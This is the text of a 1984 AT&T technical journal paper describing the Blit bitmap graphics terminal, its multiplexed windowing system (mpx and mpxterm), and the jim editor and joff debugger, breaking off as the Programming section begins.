The Blit is a programmable bitmap graphics terminal designed specifically to run with the UNIX™ operating system. The software in the terminal provides an asynchronous multiwindow environment, and thereby exploits the multiprogramming capabilities of the UNIX system, which have been largely under-utilized because of the restrictions of conventional terminals. This paper discusses the design motivation of the Blit, gives an overview of the user interface, mentions some of the novel uses of multiprogramming made possible by the Blit, and describes the implementation of the multiplexing facilities on the host and in the terminal. Because most of the functionality is provided by the terminal, the discussion focuses on the structure of the terminal's software.

I. INTRODUCTION

The Blit† is a graphics terminal characterized more by the software it runs than by the hardware itself. The hardware is simple and inexpensive (see Fig.
1): 256K bytes of memory dual-ported between an 800-by-1024-by-1-bit display and a Motorola MC68000 microprocessor, with 24K of ROM, an RS-232 interface, a mouse, and a keyboard. Unlike many graphics terminals, it has no special-purpose graphics hardware; instead, the microprocessor executes all graphical operations in software. The reasons for, and consequences of, this design are discussed elsewhere (Ref. 2).

* AT&T Bell Laboratories.
† The name comes from the second syllable of the bitblt graphics operator (Refs. 1, 2). It is not an acronym.

Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted without payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permission. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor.

Fig. 1 - Hardware overview.

The microprocessor can be loaded from the host with custom applications software, but the terminal is rarely used this way. Instead, a small multiprocess operating system is loaded into the terminal, and the processes under that operating system are then loaded. The operating system is structured around asynchronous overlapping windows, called layers (Ref. 3). Layers extend the idea of a bitmap and the bitblt operator (Refs. 1, 2) to overlapping areas of the display, so a program may draw in its portion of the screen independently of other programs sharing the display. The Blit screen is therefore much like a set of truly independent, asynchronously updated terminals. This structure nicely complements the multiprogramming capabilities of the UNIX system and has led to some new insights about multiprogramming environments.
Programs in the terminal have access to an extensive bitmap graphics library, which is implemented using the layerop primitive (Ref. 3), and is distinct in its use of abstract data types for geometrical objects and its lack of device independence: the library is closely coupled to the terminal and its programming environment (Ref. 2). The programs that have been written for the Blit include a popular text editor with a paucity of commands, a debugger that can be used effectively without reading any documentation, a surfeit of 24-by-80-character terminal emulators, and not nearly enough games. But this paper is not about the programs in the terminal so much as their environment and interrelationships. Reference 3 discusses how to update overlapping windows asynchronously; this paper discusses what to do with them.

The discussion is in three main sections: an overview of the history and motivation behind the terminal, a brief description of the user interface, and some details of the implementation. The reader is assumed to have some familiarity with the UNIX operating system, although the details relevant to the Blit will be discussed.

II. HISTORY AND MOTIVATION

The original idea behind the development of the Blit hardware was to provide a graphics machine with about the power of the Xerox Alto (Ref. 4), but using 1981 technology (large address space microprocessors, 64K RAMs, and programmed array logic) to keep size, complexity, and, particularly, cost much lower. Too many graphics work stations are so expensive that several people must share one, sometimes using sign-up lists.

Because we refuse to have rotating machinery in our offices, we wanted to build the Blit around a network interface rather than a disc. But after several lengthy discussions we decided that network hardware and software were not yet inexpensive, available, or reliable enough to be the center of a work station (the situation now is hardly better).
Rather than compromise our principles, and to keep costs low, we therefore chose to make the Blit a regular terminal with an RS-232 Electronic Industries Association (EIA) port to a time-shared host. Only one integrated circuit is needed to connect the microprocessor to the EIA line, so the electronics fits on a single board, which minimizes cost, size, and packaging complexity: the board mounts inside the monitor cabinet. This decision to use RS-232 limited the high end of the capabilities of the Blit, but it expanded the low end enormously. Blits can be used anywhere 24-by-80 ASCII terminals are used, including each office in our research center. But perhaps most important (at least to us), Blits are inexpensive, portable, and so easy to communicate with that we can take them home. Researchers in our group have 1200-baud dial-up terminals at home. For the home computing environment to be effective, it must be as similar to the office environment as possible; although 1200 baud is slow (our terminals at work run at 19,200 baud), a Blit at 1200 baud is much better than a regular terminal at 1200 baud. Also, the local processing power of the terminal can make up for some of the reduced bandwidth. So although a high-speed network would be desirable, much of the Blit's success can be attributed to the use of RS-232.

We initially intended to use the Blit to explore interactive graphical environments along the lines of Smalltalk, but soon decided that we had neither the energy nor the inclination to build a complete programming environment. The UNIX system has a comfortable set of tools for program development and general programming that would require great effort to reproduce, but that we wanted to use when developing and using the Blit. Also, the UNIX system is the framework of all computing done in our group and is not likely to be supplanted easily by something new, no matter how attractive.
We therefore began thinking about using the Blit to improve the programming environment, rather than replace or even merely add to it.

One of the distinguishing characteristics of the UNIX system is multiprogramming, the ability to run several programs at once. The best known use of multiprogramming is the pipe, an I/O connection between two processes that sends the output from one process to the input of another. The UNIX command interpreter, called the shell, has a simple syntax for pipes:

    who | lpr

which sends the output of who to the lpr command, which spools output for the line printer.

Programs in a pipeline are related by their interconnection, but the UNIX system also allows unrelated processes to execute simultaneously. The shell postfix operator & runs a command in the background, that is, without waiting for it to finish. For example,

    cc prog.c &

runs the C compiler on the file prog.c and immediately returns to the user; normally, the shell would wait for cc to complete before reading the next command from the terminal. Background processes have their input disconnected from the terminal, but messages printed on the terminal will appear there, asynchronously with other input and output on the same terminal. This can be annoying if a process using the terminal interactively is maintaining a full-screen image, because output from background processes will modify the screen image without the foreground process's knowledge. For example, error messages from a background cc will interfere with a screen editor.

The problem exists because several processes are using a single terminal for their I/O. If the terminal were multiplexed between the processes, their input and output could be kept separate.
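Both operators described above can be exercised in a few lines of shell. In this sketch wc stands in for lpr so that no printer is needed, and sleep stands in for the compiler:

```shell
# A pipe: who's output feeds another command (wc here, counting
# login sessions, in place of the lpr spooler).
sessions=$(who | wc -l)

# The & operator: run a command in the background, then rendezvous
# with it later.  $! is the background process's id.
sleep 0 &
wait $!
status=$?
```

The shell returns to the user immediately after the &; the asynchronous-output annoyance described in the text arises precisely because such a background job shares the terminal with whatever runs next.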
The "job control" software (Ref. 5) developed by Jim Kulp at the International Institute for Applied Systems Analysis in Vienna and Bill Joy at the University of California at Berkeley allows the user to pass the terminal between processes on the same terminal, essentially by flipping processes from the background to the foreground at the user's signal. But the state of the terminal is not maintained correctly when the user flips between processes: the screen contents and terminal modes are not restored to those of the new foreground process. The problem is resolved by interfacing the editors to the job control mechanism so they can preserve the screen's appearance; but that is far from transparent to the programs.

To provide a better terminal for use by the UNIX system, we began thinking about programming the Blit so each process or related set of processes has a reserved portion of the screen, called a window. That way, compiler error messages appear in the window where the compiler is running, and editing can continue undisturbed in another window. If the terminal maintains the state for the various processes and provides an appropriate user interface for creating and switching between windows, the UNIX system need not have job control or maintain the state of the screen for the various processes. Instead, the UNIX system can treat the windows like individual terminals.

Most window systems permit the user to focus attention on one window at a time, with the other windows maintained statically. Windows on the multiprogrammed UNIX system, however, must be updated asynchronously. That is, characters written to a window by a process must appear immediately, regardless of whether the user's keyboard is currently connected to that window. Otherwise, compiler errors would not appear until the user asked for them, which would cancel some of the advantages of multiprogramming.
Also, as will develop later, the possibility of conveniently controlling asynchronous processes leads to some innovative computing techniques.

While the Blit hardware was being designed, we experimented with asynchronous windows on a Blit predecessor built by Dave Ditzel. Following the pattern set by "intelligent terminals," we programmed the terminal to interpret escape sequences to create, delete, and switch the host character stream between windows. A program on the UNIX system sat between the user programs and the terminal, and inserted escape sequences in the character stream to send data to the correct window. Although this early implementation was clumsy and fragile, it demonstrated the feasibility and power of an asynchronous window terminal and pointed out the issues that must be resolved for a workable multiwindow terminal:

1. Windows must be updated asynchronously. The trial system was primitive but worked well enough to be convincing.

2. The screen is not big enough (regardless of how big it might be). Therefore, windows must overlap. The desires for overlap and asynchronism led to the development of layers, an implementation of overlapping, asynchronously updated windows.

3. The software to generate the incremental control information (escape sequence "switch to window x") from high-level requests ("draw these characters in this window") was messy: too much state information was maintained by the terminal and guessed at by the UNIX program. The implementation also encouraged attempts to optimize the number of characters sent, which added to the complexity, a situation familiar to authors of screen editors. Putting all data into labeled packets eliminates this confusion and obviates optimization.

4. A simple RS-232 connection is not robust or controllable enough to connect two communicating programs, in this case the UNIX system and the code in the terminal. An error-corrected protocol with flow control is required.

5.
To draw graphics in the windows, sending escape sequences is traditional but makes poor use of the processing power of the terminal, and requires the terminal to be preprogrammed with all desired capabilities. Contrary to popular usage, an intelligent terminal is not an idiot savant; it is one that can be educated. If the terminal could be dynamically programmed, the desired functionality could be added on demand.

GRAPHICS TERMINAL 33

Our solution was to write a small time-shared operating system for the terminal, called mpxterm (multiplexed terminal), into which we dynamically load programs from the host, customizing the terminal process running in a layer for the execution of a particular graphics task. The Blit therefore developed into a programmable graphics multiplexer, distributing the terminal resources — screen, mouse, keyboard, RS-232 interface — between terminal processes connected to independent UNIX system processes. Since the design of the terminal’s software was largely dictated by the desired user and programmer interface, the next two sections present the overall user interface and an overview of two programs that run in the multiplexed environment. The subsequent sections outline the implementation of the multiplexing software.

III. WHAT THE USER SEES

After logging in to a UNIX system, a Blit user types mpx to the shell. The multiplexed terminal code is then down loaded into the terminal, which takes a few seconds at 19,200 baud and about two minutes at 1200 baud. Mpxterm includes all the graphics primitives, but since the graphics primitives and interrupt-level I/O drivers execute out of read-only memory, they are not down loaded. Mpxterm is controlled by the mouse. Of course, programs running in the terminal may also be controlled by the mouse, so some rules must decide which mouse events are interpreted by which process in the terminal. The screen consists of several possibly overlapping layers.
Portions of the screen not occupied by layers are “colored” with a distinctive grey texture. Except for internal control and demultiplexer processes of mpxterm, terminal processes are one-to-one with layers. Once the first layer has been created, exactly one layer is the current layer, that is, the layer that receives keyboard characters and interprets mouse motion and button hits. The mouse and keyboard come as a pair; all user input is directed at a single process. The control process continually updates the current process’s mouse coordinates and button state, and a process may ask to be suspended until it is current. When a button is depressed, the current process receives the event if the mouse cursor is pointing at a visible portion of the process’s layer; otherwise, the button hit is interpreted by the mpxterm kernel.

To identify the current process, the layers of all noncurrent processes are stippled by a gauzy texture, leaving only the current layer with a clear image* (see Fig. 2). The usual solution to this identification problem is to label the windows, but we elected not to label them because the label takes up useful screen space and either the user or the program must decide what the label is. Neither option is appealing. Another possibility is to distinguish the borders of the layer, but that probably isn’t a strong enough visual clue, especially when the user is concentrating on a portion of a large layer. However, we admit that this identification issue is one of the uglier aspects of the system and that our solution is, at best, a small improvement over others. One decision that differs from the usual, but in which we are on firmer ground, is our requirement that a mouse button hit changes the current layer. In most systems, the location of the mouse defines the current window, but when the current window may be partially or even wholly obscured, this is unworkable.
(It makes sense, and is common, for the current layer to be obscured: consider typing instructions to a command in one layer based on data displayed on a graph in another large, nearly full-screen, layer.)

The mouse has three buttons, and the Blit software maintains a convention about what the buttons do. The left button is used for pointing. The right button is for global operations, accessed through a menu that appears when the button is depressed and makes a selection when the button is lifted. The middle button is for local operations such as editing. Put simply, the right button changes the position of objects on the screen, and the middle button changes their contents. For example, pointing at a noncurrent layer and clicking the left button makes that layer current. Pointing outside the current layer and pushing the right button presents a menu with entries for creating, deleting, and rearranging layers. Clicking a button while pointing at the current layer invokes whatever function the process in that layer has bound to the button. The next section discusses two programs and how they use the mouse.

The state of mouse input is reflected by the cursor tracked by the mouse as it is moved. Usually, the cursor is an arrow pointing to the pixel at the mouse’s location. A program may change the cursor to reflect its state. For example, when the user selects New on the mpxterm menu, the cursor switches to an outlined rectangle with an arrow, indicating that the user should define the size of the layer to be created by sweeping the screen area out with the mouse. Similarly, a user who has selected the Exit menu entry is warned by a skull-and-crossbones cursor that confirmation is required before that potentially dangerous operation will be executed.

* This practice interferes with noncurrent processes drawing in their layers, but most graphics in the Blit world is done in XOR mode, which commutes with the stippling, and the operating system provides a simple routine to help with graphics that are not XOR.

Fig. 2 — A representative Blit screen. The small layer at center right is running the debugger joff, which is examining the menu data structure in the text editor jim, running in the upper layer. Jim is the current process — its layer is not freckled — and is editing the files for this paper: mpx.troff is the troff input, and the various fig files are pic descriptions of the illustrations. The lower jim window is editing the description for Fig. 1, and when the user selects write from the menu, the file will be written and the picture in the typesetter emulation layer at the bottom will asynchronously draw the new picture (see the text). The small layer at the bottom is running a dynamic UNIX system monitor, reporting the current time, average number of UNIX processes ready to run, and change in that number in the last minute. The textured bar in the upper portion of the layer adjusts constantly to report the fraction of host CPU time consumed (by all users) in, from left to right, regular user computation, low priority user computation, system overhead, character processing, and idle time. The constantly shifting bars give interesting feedback on the quantity and quality of computation on the host computer. The large obscured layer in the middle is running the UNIX shell; the other layers are running down-loaded Blit programs with host support. Note the relationships between the programs: the debugger is examining the editor, but the editor is free to run; the editor and typesetter emulator are asynchronously coupled through the file system; the system monitor runs constantly, and all programs are able to draw on the display at any time, regardless of overlap or user attention.

IV. TWO APPLICATION PROGRAMS: JIM AND JOFF

A variety of programs have been written for the mpxterm environment. As with any graphics terminal, the first few programs were games, which in this case were characterized by being self-playing, at least optionally. On the multiplexed Blit screen, a game program can play itself while the user does putatively useful work in another layer. After the games came a spate of terminal emulators, coinciding with the proliferation of Blits inside our research center and triggered by the desire to promote the programs written for the 24-by-80 displays. This period has passed, and not entirely because a successful emulator has been created. Even strong supporters of the cursor-addressing style of terminal control have accepted the possibilities of a customized terminal program and communications protocol. Many of the 24-by-80 programs have been supplanted by Blit programs that divide the task between the host and terminal. Two programs that divide the labor effectively are jim, a text editor, and joff, a debugger for mpxterm programs. References 6 and 7 describe their user interfaces and the details of their implementation. Here we present an overview of their structure and illustrate how they use the programmability of the terminal.

Jim is a multifile screen editor that uses the mouse for all editing tasks and the keyboard only for input of text, including file names and strings such as regular expressions for context search. It is written in two pieces: a UNIX program that maintains a copy of the entire file being edited and executes global operations such as context searches on the copy; and a Blit program that does all editing and screen updating. The two programs maintain parallel data structures. The UNIX program maintains a complete copy, while the terminal tracks only what is visible on the display. Because the Blit program keeps the visible page locally, screen update can be done entirely inside the terminal; in fact, the UNIX program knows nothing about the appearance of the display.
The two programs communicate by a protocol consisting essentially of “insert string” and “delete string” message packets and requests for data, with strings containing arbitrary characters including tabs and newlines. This high-level protocol allows the software to ignore the usual problems of screen update, such as inserting and deleting tab characters and minimizing the length of transmitted strings that update the screen, and makes jim efficient in host cycles compared even to line editors. The update algorithm used by the terminal is discussed in Ref. 7. Users want the screen to update quickly, so the protocol is double-buffered for speed and the two programs usually execute asynchronously, with the terminal in control because that permits user input to be handled immediately even with low communications bandwidth.

Unlike most UNIX text editors, jim has no interactive shell escape to invoke the command interpreter from within the editor, because mpx permits the user to create a new layer with a fresh shell at any time. The typical Blit display therefore has a jim layer and a shell layer for typing commands such as compilation requests. Conversely, compiler error messages are trivially maintained by the display while a program is being edited.

The joff debugger is also controlled mostly by the mouse, although the user interface is substantially different from the user interface of jim. The half of joff that is a UNIX program maintains the large symbol table for the Blit program being debugged, and executes other large-scale tasks such as interpreting C expressions. The code in the terminal displays menus at the user’s request, collects typed input, and monitors and probes the target process.
The protocol between these programs falls into two sections: plain text that is displayed in a scrolling region in the debugger’s layer, and remote procedure calls that control the debugging, retrieve information about the target process, and build data structures such as menus and breakpoint tables in the joff terminal program. The terminal buffers user input such as keyboard characters and mouse button hits, but the host is in control. The menus displayed on a button hit are loaded by the host, and the terminal is not concerned with their contents: all interpretation of user action is done on the UNIX system. This structure is significantly simpler than the protocol in jim, but results in slower response, which is unimportant in a debugger. The joff debugging program has no direct interface to a text editor (although it displays the text of the source line at a breakpoint), again because the mpx environment allows the user to have an editor available at all times.

Both jim and joff down load about 10K bytes of code to the terminal. The half of jim executed on the UNIX system is another 20K of VAX-11* code; joff is about 70K on the VAX* computer.

V. WHAT DOES IT ALL MEAN?

The Blit application programs, with some noteworthy exceptions, are really not all that interesting. They are fairly ordinary graphics programs, many of them written as playthings by people new to graphics. What is interesting is how the programs work together in the underlying environment. The standard example is compiling a program while editing, with compiler messages appearing in a separate layer without interfering with the editor; but there are more interesting examples.
Our local computing environment contains many minicomputers connected by a local area network, controlled by a cluster of five 24-by-80 terminals, so the person maintaining the network can simultaneously monitor several machines, including those running the network control program. With a Blit, a programmer writing network code can, instead, monitor and debug the distributed processes from a single terminal — and from anywhere there’s a Blit, including at home. Similarly, a Blit makes a fine console terminal for a multiprocessor computer.

The graphics capabilities can be used for more than text. Computer-Aided Design (CAD) applications are obvious, although there actually have not been many CAD programs written — certainly fewer than have been asked for. Still, it is valuable to be able to use one’s terminal to share graphics and text in separate parts of the screen, for example to edit the textual description of an integrated circuit while inspecting a plot of the circuit in another layer. This extends to looking at separate parts of the same circuit in different layers, or comparing different versions of the same circuit.

These are ordinary uses of multiple window environments, but multiprogramming provides new applications. For example, interactive design programs can be assembled out of existing parts, as is done on the UNIX system. The figures in this paper were made with pic, 8 and the pic source edited with jim. There is a program, proof, that interprets the typesetter codes generated by troff for display in a layer on the Blit. A large layer was initialized running the pipeline

    watch fig1.pic | pic | troff | proof

where watch is a variant of cat (the standard UNIX program to display a file’s contents) that prints the file’s contents each time the file is modified.

* Trademark of Digital Equipment Corporation.
Therefore, whenever the pic file was written from jim, watch would notice it had been updated and send the new picture description down the pipeline, without starting a fresh pic or troff process, for immediate display on the Blit. Syntax errors from pic can be redirected to another layer or to a file, which is then watched in another layer. Although this is hardly a real interactive picture-drawing program, it took only a few seconds to assemble and can fill the gap until an interactive program is written.

We discovered an unexpected benefit of asynchronous processes while using joff. With the standard system debuggers, the program being debugged is a child process of the debugger, which means, for example, that a program cannot be attacked with the debugger if it was started independently. This is not fundamental to UNIX, but rather is a property of the usual terminal environment. The debugger must act as an I/O multiplexer between itself, the user, and the target program. When the terminal does the multiplexing, a debugger can be started at any time and applied to any program, including one that is running — even itself.

A Blit asteroids game had a bug that caused a rock to pass over the spaceship instead of hitting it. The bug was intermittent — perhaps once out of every 100 collisions — so setting a breakpoint was impractical. Instead, joff was loaded and applied to an asteroids game, which was then played for about 10 minutes until the bug occurred. Then joff was told (by a flick of the wrist and two button clicks) to halt the game. A breakpoint on the collision-testing routine was then set in the asteroids program, and the game resumed. The breakpoint fired and the bug was found easily.

As a second example, consider the following scenario, debugging joff. Some changes are made to joff, making a new version, njoff, with bugs. A program with bugs intentionally added, say Bugs, is loaded in the Blit as a target for njoff.
During testing, njoff makes a mistake interpreting a data structure in Bugs. An instance of joff is, therefore, loaded to investigate njoff to see where it went wrong, but the correct interpretation of the data structure is unknown, so a second joff is called up as a reference source to look at Bugs. At this point, there are three debuggers and a target program active on the terminal, but the situation is comfortably under control, although inconceivable in a conventional terminal environment.

There are more mundane uses of the asynchronism. Many of us have mail boxes on remote machines, reachable only through 1200- or even 300-baud phone lines. A mail message could take one minute to print out at 300 baud, but a Blit user need not be idle during that time. The layer with the remote connection will collect the message while the user does something else in another layer, so the user’s bandwidth can be much higher. If the phone lines to the remote machine are all busy, the user could type

    until cu remote-machine
    do
            sleep 600
    done

to try every ten minutes until the connection is made. The layer with this program will print something like

    connect failed: line busy

every ten minutes. Meanwhile, the user can do anything else on the terminal. Eventually, a line becomes free, the remote machine’s login banner pops up, and the user can switch to that layer and log in. No combination of background processes, job control, and static window contexts can achieve this so simply.

VI. MPX: THE HOST PROCESS MULTIPLEXER

The multiplexing is handled by software distributed between the host and terminal. A user-level UNIX program, mpx, communicates with a small real-time multiprocess operating system, mpxterm, running in the terminal (see Fig. 3). The design of mpx is sensitive to the details of UNIX system Interprocess Communication (IPC) facilities, which vary widely between UNIX system versions.
Mpxterm, on the other hand, is independent of the host except for communication by a simple protocol that it is the job of mpx to interpret; all versions of mpx speak the same protocol.

Fig. 3 — Overview of mpx.

The protocol multiplexes I/O on the single RS-232 cable from the terminal to the host. The multiplexing connects UNIX system process groups one-to-one to processes in the terminal. A user on a UNIX system with a conventional terminal types instructions to a shell. The shell and the programs it invokes, such as editors and compilers, are members of a single process group, a structure maintained by the kernel. The process group associates processes with a terminal session, mainly to send events such as keyboard interrupts to all processes on the terminal. The mpx program couples each process group to an independent terminal process in the Blit. Four basic capabilities are necessary to implement mpx:

1. Dynamic creation and control of several process groups by a single master process (mpx)

2. Multiplexing of I/O between the process groups and the master

3. A means to prevent the master from being suspended when it reads data from a process that has no characters available while another has data

4. Ability to distinguish control information (such as setting terminal modes) and data on an interprocess channel.

The original mpx was written using Greg Chesson’s file multiplexing facilities in the 7th edition UNIX system. In UNIX System V, the IPC for mpx is provided by a kernel driver written by Piers Dick-Lauder. The mpx running on the author’s machine exploits the user-level IPC in the character I/O system of the 8th edition. Since that version of mpx is the closest to hand, it will be described here. It comprises about 1600 lines of code, half of which implement the error-correcting protocol between the host and the terminal. A schematic of the mpx/mpxterm pair is in Fig. 3.
Character processing in the 8th edition kernel is done by a sequence of coroutines called line disciplines, 9 each of which is a full-duplex I/O pseudoprocess that performs its portion of the processing and hands the data along to the next line discipline. They are not proper processes because the kernel maintains no call records across scheduling boundaries. They are connected together serially to achieve the desired function, much like a full-duplex shell pipeline. For example, a terminal connected to a user program on our local area network is connected, from the bottom up, to a network driver (essentially half of a line discipline, the other half residing in the network), a line discipline interpreting the network protocol, a standard terminal line discipline that provides services such as character echo and correction of typing mistakes, and another half-discipline to connect to user level.

To connect a terminal, there must be a name in the file system to attach to the associated data structure in the kernel. The directory /dev/pt contains even-odd pairs of junctor devices, each of which is called a pseudoterminal, or pt. If one process opens an odd-numbered pt file and another opens the corresponding even file, then data written on one file can be read from that file’s partner, in symmetrical full-duplex fashion. The odd-numbered member of a pair is the master. Masters and slaves differ only in the rules for opening; I/O is symmetric. Master pt files may be open in at most one process. A process wishing to establish a connection opens an odd-numbered file; then one or more slave processes may open the corresponding even-numbered file and communicate with the master. Multiplexed I/O is done by a primitive called select.
Because I/O can block — if a process reads from a device that has no data available, the process is suspended until data arrive — mpx cannot simply read from the active processes in turn, or it may wait for data from one process while another has data. The select call returns a bit vector indicating which file descriptors have data to be read, or, according to an argument in the call, which file descriptors may be written to without similarly being suspended until the data are read at the other end.

Fig. 4 — Interprocess communication in mpx.

Figure 4 illustrates the interconnection of these components. Following the path from a user process such as a shell, running in a layer, characters enter the kernel and flow through a terminal discipline that does terminal processing for the user process, such as echoing characters typed by the user. The bottom of the terminal discipline connects to the slave side of the pseudoterminal. The characters cross to the master side, where they are passed through a message line discipline out of the kernel to mpx. The message discipline converts all information on the path into data messages, each of which is prefixed by a header identifying the type of the message. Ordinary characters are tagged data, system I/O control requests (ioctl) are marked as such, and some other control messages are translated, such as hangup, which occurs when the channel shuts down, for example, when the shell exits. These messages are read by mpx, which identifies the channel with data using a select call. Mpx interprets the data, which for ordinary characters merely involves reformatting the message (adding a tag specifying which layer will receive the data and a cyclic redundancy check for error detection and recovery) and sending it down its standard output to the terminal.
Data from the process is read from a channel established by mpx (see the discussion of layer creation below), while the connection to the Blit is through the standard input and output, because mpx is multiplexing its subprocesses onto its terminal, the Blit. On the other hand, the standard input and output of the shell process in a layer are connected to the mpx channel for that layer. On their way from mpx to the Blit, the characters enter the kernel again, where they pass through a terminal discipline (the one installed by the login program when the user signed on to the system before running mpx; for data transparency this discipline is actually largely disabled) and out to the terminal. In the Blit, the layer identification tag is stripped off, and the data are placed in the input buffer of the terminal process in the appropriate layer. Information flowing in the other direction follows the reverse path.

Although this structure sounds complicated, it is actually fairly clean: the delicate requirements of the interprocess communication are met by connecting together small piece parts with simple interfaces. As a result, the multiplexing does not interfere with other programs, in contrast, for example, with the original mpx using multiplexed files, which prohibited running in layers programs that themselves multiplexed. Moreover, because the 8th edition UNIX system I/O was written precisely to do this sort of stream processing and interconnection, it is efficient. Perhaps the most brutal test of efficiency is down loading a program into a terminal process: the terminal does almost no processing of the program text, so it is constantly waiting for data from the host. After each 64 bytes of data sent, an acknowledgment packet from the terminal arrives and is processed by mpx as part of the communications protocol, so there is frequent scheduling between the down loader and mpx.
Our UNIX system has no assembly language assist for terminal I/O, the hardware generates an interrupt for every character sent or received, and the data from the down loader cross the kernel-user interface twice. Despite this overhead, at 19,200 baud the RS-232 line is almost saturated, delivering over 16,000 user bits per second into the terminal and consuming 70 percent of a VAX-11/750* machine’s capability (this implies a maximum of about 400 instructions executed per byte on the VAX system). To our knowledge, no other version of the system on the same hardware can deliver down-loaded programs faster than about 6000 baud.

When the user on the Blit asks to create a new layer, the following events occur. The terminal allocates a layer data structure on the display and creates a terminal process to manage it. It then sends a message on its RS-232 connection, the standard input of mpx, stating that a layer has been created and specifying the channel in the communications protocol onto which its data will be multiplexed. Then mpx opens an idle master pt file, and the channel number (different from the communications channel) returned by the open is the connection of mpx to the subprocess about to be created. Mpx pushes a message line discipline onto the stream on the master side of the pseudoterminal and forks to create a child process. The child closes all of its file descriptors and opens the slave side of the pseudoteletype, which becomes its standard input and is duplicated to form its standard output and standard error output. It then pushes a terminal line discipline onto the stream and initializes the terminal modes. Finally, it establishes itself as a separate process group and executes a shell.
When the shell begins, it prints a prompt on its standard output, which flows through the path outlined above and eventually arrives in the input buffer of the terminal process, which copies it to the display, and the act of creation is complete. The elapsed time is perhaps a half second.

VII. MPXTERM: THE TERMINAL OPERATING SYSTEM

Inside the Blit runs a tiny operating system that provides essentially the same multiprogramming and data transparency as mpx. It is basically a mirror image of mpx, but with considerably less mechanism, largely because the multiplexing is built into the operating system rather than being constructed at user level. The basic structure of the system is a set of independent processes scheduled round robin that call a primitive queue-based kernel to service I/O requests. At the time of writing, mpxterm is 1627 lines of C, excluding code for the protocol (which uses the same source files as mpx) and the graphics primitives, but including all the user interaction and I/O primitives; and 204 lines of assembler. The assembler lines include 11 lines to switch stacks, 108 lines to interface interrupt routines to C code, and 85 repetitive lines to interface to C code after a process traps.

Process switching is performed only at the process’s request; there is no preemptive scheduling. Since the Blit is a terminal, and not a general-purpose computer, the processes all do some form of input or output, whether to read characters from the host or keyboard, or even just display something on the screen. If a process wants a character from, say, the keyboard, but none has been typed, it can suspend itself by executing

    wait(KBD)

which says “wait until a keyboard character becomes available.” Because the display is updated at 30 Hz, a display program will usually suspend execution until the screen reflects the change it has made in memory.
Therefore, although the programmer must be aware that the CPU is being shared among other processes, the habit of relinquishing the processor fits smoothly into the discipline required for real-time graphics programming. This structure keeps mpxterm simple (and easy to debug). Except for the lowest level of I/O, which must protect against device interrupts, there are no semaphores or interlocks in the kernel; the process control part of mpxterm was written and debugged in an evening.

The devices — mouse, keyboard, and host RS-232 port — are all interrupt driven. The keyboard and RS-232 port place their characters into queues that are read by server processes running at user level (i.e., with processor interrupts enabled). The mouse buttons generate an interrupt when their state changes, and their value is kept in a global data structure, along with the mouse position. As the mouse moves, the hardware updates two registers in the I/O page but generates no interrupts. Instead, the mouse position on the screen is updated during vertical blanking by a low-priority interrupt routine that runs off a 60-Hz clock coupled to the start of vertical retrace. Because of the 30-Hz display refresh, there is no reason to update it more frequently. The clock interrupt and mouse button interrupt schedule a control process that multiplexes the mouse among the user processes. At any time, only one user process receives mouse tracking and button hit information from the control process. Any other process attempting to use the mouse is suspended until the user indicates by a button hit, handled by the control process, that the mouse and keyboard should be bound to that process instead. A second system process, the demultiplexer, reads the characters from the host input queue, unpacks the messages, and executes the error-correcting protocol. Correctly received messages are placed in the input queue of the associated user processes.
The error correction is transparent to the processes; as far as they can tell, they have a direct link to a plain RS-232 wire, except that no flow control is necessary on either end (compare this to the control-S/control-Q or NUL-padding flow control necessary with many standard terminals). The demultiplexer occasionally receives control messages, indicating, for example, that a terminal process is to begin executing the download receiving procedure preparatory to loading a new terminal program into a layer.

46 TECHNICAL JOURNAL, OCTOBER 1984

All resources are shared among the processes in the Blit. Memory allocation occurs through two primitives: alloc allocates memory at fixed locations, to store programs, for example; and gcalloc allocates relocatable memory in a compacted arena, to store bitmaps and strings. This split structure is imposed by the open addressing of C and the necessity to compact the arena containing dynamically allocated bitmaps. User processes and the kernel allocate using the same code, and each allocated object is tagged with a pointer to the process that owns it, so storage can be reclaimed when a program exits. Storage allocation is simplified by the lack of preemptive scheduling; interlocks during compaction are unnecessary, since allocations are atomic.

Because the hardware does not provide memory management and our C compiler does not generate position-independent code, downloaded programs are relocated in the host to an address returned by alloc in the Blit. Relocation is not expensive; the text editor, which is about 10K bytes long, is relocated in three seconds and downloads in about six seconds at 19,200 baud. This is comparable to the initialization time of most conventional screen editors.

The Blit hardware provides one feature for protection. Read or write references to the first eight bytes of the processor's address space generate an interrupt that is caught by the kernel, which halts the offending process.
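The owner-tagged, compacting allocation can be sketched in C. This is an illustration, not the Blit's allocator: the handle indirection, the header layout, and every name below are assumptions. It only shows how tagging each object with its owner lets storage be reclaimed when a program exits, and how compaction can slide surviving objects down without interlocks, since under cooperative scheduling an allocation runs to completion.

```c
#include <string.h>

#define ARENASIZE 4096
#define NHANDLE   64

struct hdr {
    int size;       /* payload bytes, rounded to int alignment */
    int owner;      /* owning process id */
    int handle;     /* index in the handle table */
};

static char arena[ARENASIZE];
static int  arenatop;
static char *handle[NHANDLE];   /* users hold indices, not raw pointers,
                                 * because objects may move */

int gc_alloc(int owner, int size)
{
    struct hdr *h;
    int i;

    size = (size + 3) & ~3;     /* keep headers aligned */
    if (arenatop + (int)sizeof(struct hdr) + size > ARENASIZE)
        return -1;
    for (i = 0; i < NHANDLE && handle[i] != NULL; i++)
        ;
    if (i == NHANDLE)
        return -1;
    h = (struct hdr *)(arena + arenatop);
    h->size = size;
    h->owner = owner;
    h->handle = i;
    handle[i] = (char *)(h + 1);
    arenatop += sizeof(struct hdr) + size;
    return i;                   /* handle for the new object */
}

/* Free everything owned by a departing process, then compact the
 * arena, sliding survivors down and updating their handles. */
void gc_reclaim(int owner)
{
    int src = 0, dst = 0;

    while (src < arenatop) {
        struct hdr *h = (struct hdr *)(arena + src);
        int len = sizeof(struct hdr) + h->size;

        if (h->owner == owner) {
            handle[h->handle] = NULL;           /* drop the object */
        } else {
            if (dst != src) {
                memmove(arena + dst, arena + src, len);
                h = (struct hdr *)(arena + dst);
                handle[h->handle] = (char *)(h + 1);
            }
            dst += len;
        }
        src += len;
    }
    arenatop = dst;
}
```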
Because a common C programming error is to dereference through a null-valued pointer, this small feature has saved mpxterm many times. For an unprotected system, mpxterm is pleasantly robust. It is certainly shut down quietly at the end of a working day far more often than it crashes. Left running, its mean up time is several days, even during periods of program development.

VIII. PROGRAMMING

